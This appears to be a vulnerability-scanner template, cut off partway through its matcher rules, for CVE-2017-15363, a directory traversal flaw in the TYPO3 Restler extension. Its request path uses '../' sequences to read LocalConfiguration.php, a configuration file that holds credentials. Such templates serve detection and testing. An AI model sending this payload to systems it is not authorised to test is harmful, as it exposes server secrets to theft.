id: CVE-2017-15363 info: name: TYPO3 Restler - Arbitrary File Retrieval author: 0x_Akoko severity: high description: Directory traversal vulnerability in public/examples/resources/getsource.php in Luracast Restler through 3.0.0, as used in the restler extension before 1.7.1 for TYPO3, allows remote attackers to read arbitrary files via the file parameter. reference: - https://www.exploit-db.com/exploits/42985 - https://www.cvedetails.com/cve/CVE-2017-15363 - https://extensions.typo3.org/extension/restler/ - https://extensions.typo3.org/extension/download/restler/1.7.1/zip/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-15363 cwe-id: CWE-22 tags: cve,cve2017,restler,lfi requests: - method: GET path: - "{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php" matchers-condition: and matchers: - type: word part: body words: - "